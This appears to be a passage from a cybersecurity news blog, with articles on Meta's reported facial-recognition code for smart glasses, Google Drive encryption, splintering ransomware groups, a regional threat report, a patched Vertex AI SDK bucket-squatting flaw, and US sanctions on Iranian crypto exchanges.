In the investigation, researchers noted that three separate machine learning models were already installed on user devices to handle face detection, image extraction, and biometric conversion, respectively, associated with the feature. In earlier application builds, the capability was also referenced under the label "Connections," which implies a potential application use case that could involve assisting users in recalling individuals they had previously encountered. 

A portion of the technical analysis was reviewed by independent security experts who emphasized the findings of the study. Although the feature was never publicly announced, researchers indicated that the underlying components appeared sufficiently developed to facilitate operational testing. 

Security researchers reported that one security researcher uploaded a faceprint associated with French philosopher Michel Foucault to demonstrate the system's recognition workflow, which triggered a notification which indicated successful identification of the user. Despite Meta's long-standing involvement with facial-recognition technologies, which have been the subject of both commercial interest and regulatory pressure in the past, this disclosure has reignited scrutiny. 

Previously, the company operated one of the largest facial-recognition systems for consumers by using Facebook's photo-tagging infrastructure before discontinuing the program in 2021 and destroying more than a billion biometric records. The development of a new facial-recognition framework against this backdrop has inevitably drawn the attention of privacy advocates and industry observers. 

A company representative of Meta has, however, strongly rejected interpretations that the technology had been secretly deployed or prepared for public release. The code, according to Meta spokesperson Ryan Daniels, reflects ongoing research and product exploration and not a finished consumer feature. Meta spokesperson said no facial-recognition capability has been offered to users and no decision has been made regarding its implementation in the future. 

The company will not construct a centralized facial-recognition database, he asserted, and stated that any eventual deployment would be disclosed in a clear manner. Andy Stone echoed this position, arguing that characterization of the technology as covertly released is misleading regarding both its purpose and status at present. Despite this, the episode illustrates the tension between rapidly advancing AI-powered wearable capabilities and the security expectations associated with technologies designed to process highly sensitive biometric data. 

There was further intensification in the debate when the Threat Lab of the Electronic Frontier Foundation confirmed certain aspects of the earlier findings and noted that Meta only removed the code related to facial recognition once the issue gained significant public attention. The organization cautioned, however, that deletion does not necessarily indicate an end to development efforts. 

In the course of investigating Meta, it was discovered that there appeared to be an apparent connection between Meta and the biometric technology provider Rank One Computing, a provider of facial recognition solutions for the United States Army and the U.S. Rank One's technology has been linked to Meta AI, the application used in conjunction with the company's smart glass ecosystem according to the report. 

According to the report, the contract permitted access to advanced biometric features, including facial recognition and liveness detection systems. These systems are designed to distinguish a real individual from a photograph, mask, or other spoofing attempt. Researchers expressed concern about the narrow technological gap between government-grade surveillance platforms and consumer-facing wearable devices, arguing that the gap is narrowing rapidly. 

A number of public clarifications regarding the reported partnership have not been made by either company Rank One Computing reportedly declined to respond, while Meta maintains that no consumer-facing facial-recognition features have been released and no final product decision has been reached. 

Additionally, Meta did not confirm if third-party biometric engines with military-grade accuracy are being evaluated for future wearable products. Nonetheless, the revelations have renewed discussion about Meta's long and often controversial history with facial recognition. It was due to years of regulatory pressure that the company dismantled its large-scale facial recognition infrastructure on Facebook in 2021, despite hundreds of millions of users opting into the system previously. 

Recently, Meta settled a lawsuit over allegations relating to the collection of biometric data for $1.4 billion. It was reported earlier this year that Meta had explored ways to use information related to its social media ecosystem to identify individuals using smart glasses. Further concerns have been raised about the integration of biometric intelligence into future consumer products. 

The issue of privacy and cybersecurity goes beyond the release of a single product or feature. Through the transformation of a person's face into a persistent digital credential that can be stored, matched, and analyzed, facial recognition systems fundamentally alter the balance between anonymity and identification in public spaces. 

A number of advocacy organizations have argued that such technologies are disproportionately damaging to marginalized groups, contribute to misidentification, and create avenues for unauthorized surveillance. The security threat associated with biometric identifiers is that, unlike passwords, they cannot simply be changed once they have been exposed. 

The evolution of smart glasses into platforms combining cameras, microphones, artificial intelligence, and biometric processing is increasingly challenging regulators, technologists, and consumers alike. There is the question as to whether privacy safeguards can keep pace with the capabilities being built into the next generation of wearable computing devices. 

A growing number of wearable devices can collect, analyze, and interpret real-world data, thereby expanding the debate from what a wearable device can achieve to how it should be utilized responsibly. In Meta's facial-recognition prototype, questions arise that illustrate an underlying cybersecurity and privacy challenge faced by the industry: ensuring that innovation relating to biometric data is accompanied by transparency, accountability, and meaningful user protections. 

Organizations and consumers should take note that features involving identity recognition should be carefully scrutinized, particularly as the lines between convenience, surveillance, and privacy become increasingly blurred.
Read more »
Technology
cloud storage security End-to-End Encryption Google Drive encryption Google Drive privacy Google Drive security Technology

Why Privacy-Conscious Users Should Think Twice Before Storing Sensitive Files on Google Drive

 

Google Drive has become an essential tool for millions of users worldwide. Whether it's storing contacts, backing up WhatsApp chats, or saving photos, videos, and important documents, the platform serves as a central hub for digital storage. Its deep integration with Google's ecosystem makes it a convenient choice for Android and Gmail users alike.

However, while Google Drive offers robust security against cyber threats, questions remain about whether it is the best place to store highly sensitive personal information. Documents such as passport scans, banking records, legal contracts, and tax returns may require an additional layer of protection beyond what the service provides by default.

From a security standpoint, Google Drive employs industry-standard safeguards. Data is encrypted while being transferred using TLS protocols, and files stored on Google's servers are protected with AES-128 encryption. Users can further strengthen account security through features like passkeys and two-factor authentication.

The key concern, however, lies in how the encryption system works. Unlike services that provide end-to-end encryption, Google retains control of the encryption keys used to access stored files. This means the company has the technical ability to decrypt and view user data when necessary.

"When you upload a file, Google encrypts it with a unique data encryption key, then encrypts that key with another key it controls, and stores both on its servers. To read the file, Google's systems unwrap the keys on the fly. With true end-to-end encryption, only your device holds the key, so even the service provider sees nothing but scrambled bytes. Google's setup doesn't meet that bar."

As a result, while hackers and unauthorized third parties face significant barriers in accessing files, Google itself can access stored content. Additionally, government agencies or courts may compel the company to share user data through legal processes because Google possesses the necessary decryption keys.

Another privacy consideration is automated content scanning. Google uses systems that review files for policy enforcement purposes, including identifying known illegal content and potential violations of its terms of service. Although the company states that Drive content is not used for advertising purposes, automated systems can sometimes generate false positives, potentially leading to account restrictions or suspensions.

Artificial intelligence is also expanding Google's access to stored data. As Gemini becomes more deeply integrated into Workspace products, it requires permission to analyze files in order to generate summaries and provide contextual assistance. While Google maintains that Drive files are not used to train its general AI models, some privacy advocates argue that increased AI integration broadens the potential exposure of personal information.

"This doesn't mean Google is malicious or will snoop on you. It means the threat model is different from what most people assume. You're not just trusting Google to fend off hackers; you're trusting it never to read, mishandle, or be compelled to share your data."

For users seeking stronger privacy protections, encrypting files before uploading them to Google Drive is often recommended. Applications such as Cryptomator allow users to create encrypted vaults on their devices, ensuring that files remain unreadable to Google. VeraCrypt is another option that enables users to create secure encrypted containers that can be synced to cloud storage services.

Those looking for built-in privacy protections may consider alternative platforms. Services such as Proton Drive, Tresorit, and Sync.com offer end-to-end encryption, ensuring that providers cannot access the contents of user files because they do not possess the decryption keys.

There are trade-offs, however. End-to-end encrypted files often cannot be searched by content, previewed in a browser, or edited collaboratively in the same way as standard cloud storage files. Additionally, users are solely responsible for managing recovery credentials, meaning forgotten passwords may result in permanent loss of access.

For particularly sensitive documents, some users may choose to avoid cloud storage altogether. External hard drives or self-hosted solutions such as Nextcloud can provide greater control over personal data while reducing dependence on third-party providers.

Despite these concerns, Google Drive remains a secure and practical solution for everyday storage needs, including photos, shared documents, and routine work files. The issue is less about security and more about privacy.

"The privacy story shifts when you start storing things that would hurt to lose to a stranger, a Google reviewer, or a court order. For those files, the answer isn't to abandon Drive but to stop treating it as a vault. Encrypt sensitive documents before you upload, or move them to a service that can't read them at all. The few minutes of friction are worth knowing that the most personal pieces of your life aren't sitting on a server with someone else's keys."

For privacy-focused users, the best approach may be to continue using Google Drive for convenience while reserving encrypted storage solutions for highly confidential files.

Read more »
Splinter Groups
Cyber Crime Met Police Ransomware Splinter Groups

Ransomware Gangs Splinter as Cyber Threat Becomes More Volatile

 

Cybercrime is moving through a major reset as the ransomware world shifts away from big, organized cartels and toward smaller, more volatile splinter groups. Speaking at Infosecurity Europe 2026, William Lyne, Head of Economic and Cybercrime at the Metropolitan Police Service, said the underground market has become a highly accessible ecosystem where criminals can buy tools, services, and stolen data with ease. He described it as a place where threat actors can get almost everything they need, except a good drink. 

The biggest driver behind this change is convenience. Cryptocurrencies have removed one of the oldest bottlenecks in cybercrime by making it much easier to cash out illegal profits, while underground marketplaces now provide ransomware kits, phishing services, infrastructure, and support on demand. That lower barrier to entry has blurred the old lines between hacktivists, criminal gangs, and state-linked actors, creating a blended threat environment that is far more crowded and harder to police.

Lyne warned that law enforcement crackdowns are also reshaping the market. When large, centralized groups such as LockBit are disrupted, their affiliates do not disappear; they scatter into smaller factions, each trying to rebuild revenue streams in a less visible way. The result is a more fragmented and “post-trust” criminal scene, where weaker internal controls and looser coordination can make attackers more aggressive, reckless, and unpredictable. 

The threat is also becoming more global. Lyne said the ransomware ecosystem is no longer dominated by traditional Russian-speaking hubs, with actors now emerging from Brazil, Türkiye, and English-speaking groups such as Scattered Spider. At the same time, criminals are increasingly using AI to search through hoarded corporate data, turning old thefts into fresh extortion opportunities and new monetization schemes. 

For police and security teams, the response must go beyond arrests alone. Lyne said the Met Police cannot “arrest its way out” of the problem and instead needs to focus on disrupting infrastructure, weakening trust inside criminal networks, and working more closely with private-sector defenders. In practical terms, that means security teams should expect a ransomware landscape that is smaller in structure but sharper in impact, where fragmented gangs may strike faster and with fewer rules than the cartels they replaced.
Read more »
Meta Security
Cyber Security Cyber Security Ransomware Attacks Cyber Threats Cyberattacks Data Breach Threat data security Hacktivism Meta Meta Security

META Threat Landscape Report Q1 2026: Ransomware, Data Breaches and Hacktivism Rise Across Middle East, Turkey and Africa

 

Early 2026 saw sharper cyber aggression throughout the Middle East, Turkey, and Africa, fueled less by isolated incidents than by coordinated ransomware attacks, politically charged hacking efforts, and repeated exposure of sensitive information. Notably, Cyble's regional analysis highlights how public institutions, financial entities, infrastructure firms, and power providers faced relentless pressure from diverse digital adversaries during those months. Amid shifting tactics, one pattern held steady - attack volume climbed without pause. Early in the year, ransomware kept gaining ground across the region. 

Across META nations, 116 cases came to light between January and March. Leading the list was Turkey, with the UAE trailing just behind. Intrusions hit South Africa and Egypt hard, too - frequent probes and breakdowns marked their networks. Known crews like Gentlemen, INC Ransom, Qilin, Tengu, and LockBit stayed busy through the period. Each group showed steady signs of operation during those months. What stands out is construction being hit hardest, then government offices, police departments, banks, and power companies. Because these sectors manage vital systems and confidential information, they draw hackers aiming to profit or cause chaos. 

Notably, ransomware crews are acting more like businesses - some run subscription-style services so partners can launch attacks faster and wider. Terabytes of sensitive files surfaced online, allegedly pulled from Qatar’s energy infrastructure - login details, cloud backups, all circulating without permission. While ransomware grabbed headlines, leaked datasets kept spreading just beneath the surface. Cyber bazaars active throughout the year moved quietly, swapping access tokens and corporate records like currency. Healthcare providers found themselves exposed. So did hotels, sports leagues, even digital influencers promoting brands. 

A single hacker boasted control over massive archives - one claim among many. State agencies showed up repeatedly in breach reports, their systems probed by actors with unclear allegiances. Motives varied: some sought profit, others appeared driven by surveillance goals or national interests. What stands out is how often attackers used known weaknesses to break into systems. Soon after flaws became public, they appeared in hacking attempts - some quickly listed by CISA as actively abused. Targeting focused heavily on corporate networks, defensive software, besides services open to the web. 

One standout issue involved Ivanti’s mobile management tool, where a severe bug allowed remote control without login verification. Access like that remains appealing; it skips the need to harvest passwords entirely. Throughout Q1 2026, hacktivism stayed prominently in view. A steady flow of leaked data, altered websites, and network floods hit thousands of online addresses in the META area. Tied closely to simmering global conflicts, especially around Israel and Iran, these actions grew more frequent. Rather than just causing outages, they began serving as tools to push narratives into online conversations. Digital platforms turned into stages where cyber acts echoed real-world disputes. 

Though quiet at first glance, new data from Cyble’s META Threat Landscape Report reveals how quickly digital dangers shift when crime blends with global tensions. Where politics and networks meet, risks climb - especially for firms tied to essential services or disputed industries. Instead of waiting, many now see value in tracking hidden signals, patching weaknesses faster, not just reacting after breaches occur. 

As hostile actors refine methods across the Middle East, Africa, Turkey, and Asia, one thing becomes clear: staying ahead means seeing more, acting sooner, adjusting constantly.
Read more »
Vertex AI
AI ethics cloud storage Data Harvesting SDK Google Google OAuth Python technology Vertex AI

Security Bug in Google Vertex AI Could Allow Model Upload Hijacking

 




Google has addressed a security flaw in the Python SDK for Vertex AI after researchers demonstrated that attackers could potentially intercept machine learning model uploads and substitute them with malicious files.

The issue was identified by researchers from Palo Alto Networks' Unit 42 team, who disclosed the findings through Google's bug bounty program. According to the researchers, the vulnerability could be exploited without compromising a target organization's cloud environment, stealing credentials, or tricking users through phishing campaigns. Instead, the attack relied on weaknesses in how the SDK handled temporary storage locations during model uploads.

Researchers referred to the technique as "Pickle in the Middle." They reported no evidence that the flaw had been exploited outside of controlled testing environments. Google has since released security updates, and organizations using Vertex AI are advised to upgrade to version 1.148.0 or newer.


Predictable Storage Names Created an Opening

The vulnerability originated from the SDK's automatic staging process.

When developers uploaded a machine learning model without manually specifying a Cloud Storage bucket, the SDK generated a temporary bucket name based on information such as the Google Cloud project identifier and deployment region.

The problem was not that the bucket name could be predicted. The problem was that the SDK only checked whether the bucket existed. It did not verify whether that bucket belonged to the project performing the upload.

Because Cloud Storage bucket names are globally unique across Google Cloud, an attacker could create the expected bucket before the victim did. If that happened, model files uploaded by the victim could be redirected into infrastructure controlled by the attacker.

In practical terms, a developer could believe a model was being uploaded to their own cloud environment while the files were actually being delivered elsewhere.


Attackers Could Replace Models Before Deployment

After receiving the uploaded files, an attacker could modify or replace the model before Vertex AI retrieved it for deployment.

This becomes particularly important because many machine learning workflows rely on serialization formats such as Pickle and Joblib. These formats are commonly used to save trained models, but they also contain functionality capable of executing instructions when the file is loaded.

As a result, a manipulated model may do more than generate predictions. It can potentially run arbitrary code inside the environment responsible for serving the model.

Unit 42 researchers demonstrated that this behavior could be abused to execute attacker-controlled code inside Vertex AI's serving infrastructure.


Researchers Exploited a Narrow Timing Window

The attack required the malicious file replacement to occur very quickly.

During testing, researchers observed that Vertex AI typically retrieved uploaded files roughly 2.5 seconds after the upload process completed.

To exploit this short interval, they created an automated Cloud Function that monitored the attacker-controlled bucket and immediately replaced newly uploaded files. The replacement process took approximately 1.4 seconds, allowing the malicious model to be swapped before Vertex AI accessed it.

This timing-based attack demonstrated that the vulnerability was practical under the right conditions rather than being a purely theoretical risk.


Proof-of-Concept Reached Beyond a Single Model

After achieving code execution, researchers tested what level of access could be obtained from the serving environment.

Their proof-of-concept extracted an OAuth token from the container's metadata service and used it to interact with resources available within Google's managed infrastructure.

According to the report, the token provided visibility into additional machine learning assets, model artifacts, TensorFlow files, BigQuery metadata, access control information, system logs, Kubernetes cluster identifiers, and internal infrastructure references.

The findings suggested that a successful compromise could potentially expose information beyond the originally targeted model deployment.


Exploitation Required Specific Conditions

The vulnerability was not universally exploitable.

Researchers noted that two requirements had to be met before the attack could succeed.

First, the expected default staging bucket could not already exist in the chosen deployment region. Second, the developer needed to rely on the SDK's default bucket-generation behavior rather than specifying a storage bucket manually.

The researchers noted that newly created Vertex AI projects often satisfy the first condition because the default bucket may not yet have been created.


Google Introduced Multiple Fixes

Unit 42 reported the issue to Google on March 5, 2026.

Google's initial response introduced additional randomness into bucket names by appending a UUID value, making bucket prediction substantially more difficult.

The company later strengthened the mitigation by implementing ownership validation checks. These checks ensure that automatically selected buckets belong to the project initiating the upload, preventing bucket-squatting attacks from succeeding.

The ownership verification mechanism was included in Vertex AI SDK version 1.148.0.

At the time the researchers published their findings, neither Google's Vertex AI security advisories nor the research report listed a CVE identifier for the vulnerability.


Recommendations for Organizations

Security teams using Vertex AI should verify that all environments are running updated versions of the google-cloud-aiplatform package. This includes development notebooks, machine learning pipelines, automated build systems, testing environments, and production deployments.

Researchers also recommend explicitly defining a staging bucket owned by the organization instead of relying on SDK defaults. This reduces the risk of storage misconfigurations and provides greater visibility into where machine learning artifacts are stored during deployment.

The disclosure is the latest example of how weaknesses in supporting cloud infrastructure can affect AI systems. As organizations continue moving model development and deployment into managed cloud platforms, security reviews must extend beyond the model itself to include storage, deployment pipelines, permissions, and the services that support the AI lifecycle.

Read more »
Terrorist Financing
Crypto Compliance Cryptocurrency Sanctions Cyber Security Digital Asset Security Iranian Crypto Exchanges IRGC Cryptocurrency Nobitex Sanctions OFAC Sanctions Sanctions Evasion Terrorist Financing

Iranian Crypto Giant Nobitex Added to US Sanctions List Amid Terror Financing Probe

 


The intersection of financial innovation, regulatory oversight, and national security has occupied digital asset platforms for years. Earlier this week, the U.S. Department of Treasury’s Office of Foreign Assets Control (OFAC) imposed sanctions on Nobitex, Iran’s largest cryptocurrency exchange, as well as three other Iranian digital asset exchanges. This convergence brought the convergence into sharp focus. 

A significant concern of the Trump Administration is that cryptocurrency infrastructure is being abused both to circumvent international sanctions and to facilitate illicit financial networks associated with government-backed activities, which is reflected in the action taken as part of its Economic Fury campaign. 

Nobitex is allegedly processing more than half of Iran's cryptocurrency inflows by 2025, according to United States authorities, establishing itself as one of Iran's most important digital asset ecosystem hubs. This platform facilitates transactions related to terror financing, sanctions evasion operations, and entities associated with the Islamic Revolutionary Guard Corps (IRGC), including ransomware-related entities. 

According to Treasury officials, the platform was also instrumental in enabling the Central Bank of Iran to obtain substantial stablecoin reserves, highlighting how digital assets are increasingly being used to influence geopolitical and economic affairs. Even though Iran has been economically isolated for many years and has been undergoing mounting geopolitical tension, the digital asset sector has emerged as a significant financial ecosystem. 

Based on industry estimates, the cryptocurrency market in the country will be worth over $7.78 billion in 2025, reflecting the growing integration of digital assets into both commercial activities and international payment channels. 

Based on blockchain intelligence assessments, it is evident that wallet addresses associated with the Islamic Revolutionary Guard Corps (IRGC) accounted for more than half of the total value flowing into Iran's cryptocurrency ecosystem during the fourth quarter of 2025. In this regard, the country’s expanding virtual asset landscape has become increasingly intertwined with national security concerns. Within this environment, exchanges targeted by Washington occupy a dominant position. 

According to Treasury data, Nobitex processed more than 50% of all Iranian digital assets inflows during 2025, whereas Wallex and Bitpin handled approximately 12% and 10%, respectively. Since its establishment in 2018, Ramzinex has facilitated more than $2.45 billion in cumulative transactions, making it one of the nation's longest-running platforms. The figures illustrate why US policymakers have focused on the enforcement of sanctions on virtual asset service providers in recent years. Increasingly, digital asset networks have emerged as alternatives to conventional financial controls for moving capital, settling transactions, and maintaining access to global liquidity.

Iranian financial institutions are largely excluded from international banking mechanisms, including SWIFT. It has been argued that these platforms have served as critical entry and exit points connecting domestic actors to international cryptocurrency markets, creating pathways through which sanctions may be evaded and funds may be transferred across borders. 

OFAC has announced the latest measures as part of a larger campaign that has already frozen approximately half a billion dollars of cryptocurrency connected to the Iranian regime. A strategic move by Washington to target the country's largest exchanges and associated infrastructure is intended to disrupt the digital financial channels through which sanctioned entities can convert, transfer, store, and repatriate value through the cryptocurrency ecosystem, extending the reach of traditional sanctions into a decentralized financial world. 

The Treasury's latest action, which builds on these allegations, targeted not just a single exchange, but what it describes as a broader cryptocurrency infrastructure network underpinning Iran's access to global digital asset markets. In addition to Nobitex, sanctions were also imposed on Iranian exchanges Wallex, Bitpin, and Ramzinex, as well as several senior executives and Nobitex founders.

Washington identified Amir Hossein Rad as a key figure within the platform's leadership structure, in addition to being the company's chairman and co-founder. The Treasury contends that Nobitex is more significant than just its market share, alleging that the exchange was a critical financial gateway for state-linked entities, facilitating transactions associated with sanctions evasion, IRGC-related activities, ransomware activity, and the movement of assets controlled by the government. Aside from that, the department also claimed that the platform enabled the Central Bank of Iran to access stablecoins worth hundreds of millions of dollars at a time when authorities were seeking a means of supporting the weakening rial and maintaining access to international liquidity channels outside traditional banking channels. 

As outlined by the Treasury Department, the exchange also facilitated access to overseas cryptocurrency platforms for Iranian officials, individuals with political connections, and affiliated entities despite decades of financial restrictions. Furthermore, US authorities claimed that, following the onset of American military operations involving Iran, Nobitex provided transfers of government assets and safeguarded them during periods of domestic internet disruption, demonstrating the growing strategic significance of digital asset networks during geopolitical crises. 

Among the sanctions included in the package were co-founders Mohammad Ali Aghamir and Mohammad Aghamir, who heads the blockchain division of the company, in which the Treasury asserted that both maintain close ties to influential Islamic circles. The company's chief executive officer, Seyed Ali Khoei, was also designated as a sanctioned individual due to his significant leadership role. 

Aside from Nobitex, Washington identified Wallex as the second largest cryptocurrency exchange by trading volume in Iran, alleging that it accounted for approximately 12 percent of the country's digital asset inflows in 2025 as well as facilitating transactions related to the IRGC. The Treasury officials indicated that Bitpin processed approximately 10 percent of Iranian digital asset inflows during that same period, and some investors involved in efforts to circumvent US sanctions were allegedly involved. 

In contrast, Ramzinex has been accused of processing transactions worth more than $2.45 billion since its inception in 2018 as well as participating in transactions involving entities associated with the Iranian government and the Islamic Revolutionary Guard Corps. Washington intends to target not only individual actors, but also the digital financial infrastructure that Tehran believes allows it to access, transfer, and repatriate funds beyond conventional sanctions enforcement mechanisms in an effort to combat this threat. 

Cryptocurrencies are becoming a critical frontier in modern financial security as geopolitical conflict, sanctions enforcement, cybercrime, and digital finance increasingly intersect. In an era when regulators are increasingly paying attention to virtual asset ecosystems beyond traditional banking networks, exchanges and financial service providers are facing increased scrutiny over compliance controls, transaction monitoring, and exposure to jurisdictions with high risk.

In the context of cybersecurity and financial security professionals, this development underscores that digital asset infrastructure is not solely viewed as a technological innovation, but also as a strategic component of national security, a phenomenon which makes transparency, risk management, and threat intelligence more critical than ever in an increasingly interconnected financial environment.
Read more »
Subscribe to: Posts (Atom)